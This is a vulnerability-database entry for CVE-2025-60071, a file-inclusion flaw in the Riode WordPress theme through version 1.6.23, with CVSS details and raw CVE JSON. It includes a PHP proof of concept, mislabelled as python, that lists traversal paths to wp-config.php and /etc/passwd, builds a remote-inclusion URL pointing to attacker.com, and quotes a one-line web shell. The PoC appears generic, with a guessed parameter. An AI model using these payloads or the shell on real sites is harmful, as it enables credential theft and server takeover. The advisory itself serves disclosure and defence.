Security Vulnerability Report
中文
CVE-2025-60071 CVSS 8.1 HIGH

CVE-2025-60071

Published: 2025-12-18 08:16:07
Last Modified: 2026-04-27 16:16:32

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in don-themes Riode riode allows PHP Local File Inclusion.This issue affects Riode: from n/a through <= 1.6.23.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Riode Theme <= 1.6.23
Riode Theme (all versions from n/a through 1.6.23)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60071 - Riode WordPress Theme LFI/RFI PoC * Vulnerability: Improper Control of Filename for Include/Require Statement * Affected: Riode Theme <= 1.6.23 * CVSS: 8.1 (High) */ // Local File Inclusion (LFI) PoC // Read wp-config.php $target_url = 'http://target-site.com/'; $lfi_payload = 'wp-config.php'; $exploit_url = $target_url . '?file=../../../../wp-config.php'; // Directory traversal to read sensitive files $dir_traversal = array( '../../../wp-config.php', '../../../wp-includes/version.php', '../../../etc/passwd', '../../../proc/self/environ' ); foreach ($dir_traversal as $path) { $url = $target_url . '?file=' . urlencode($path); echo "Testing: $url\n"; // In real attack, send HTTP GET request here } // Remote File Inclusion (RFI) PoC (if allow_url_include is enabled) $malicious_server = 'http://attacker.com/'; $rfi_payload = $malicious_server . 'shell.txt?'; $rfi_exploit_url = $target_url . '?file=' . urlencode($rfi_payload); echo "RFI Exploit URL: $rfi_exploit_url\n"; // Example malicious file (shell.txt) content: // <?php system($_GET['cmd']); ?> ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60071", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:07.410", "lastModified": "2026-04-27T16:16:31.627", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in don-themes Riode riode allows PHP Local File Inclusion.This issue affects Riode: from n/a through <= 1.6.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/riode/vulnerability/wordpress-riode-multi-purpose-woocommerce-theme-1-6-23-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}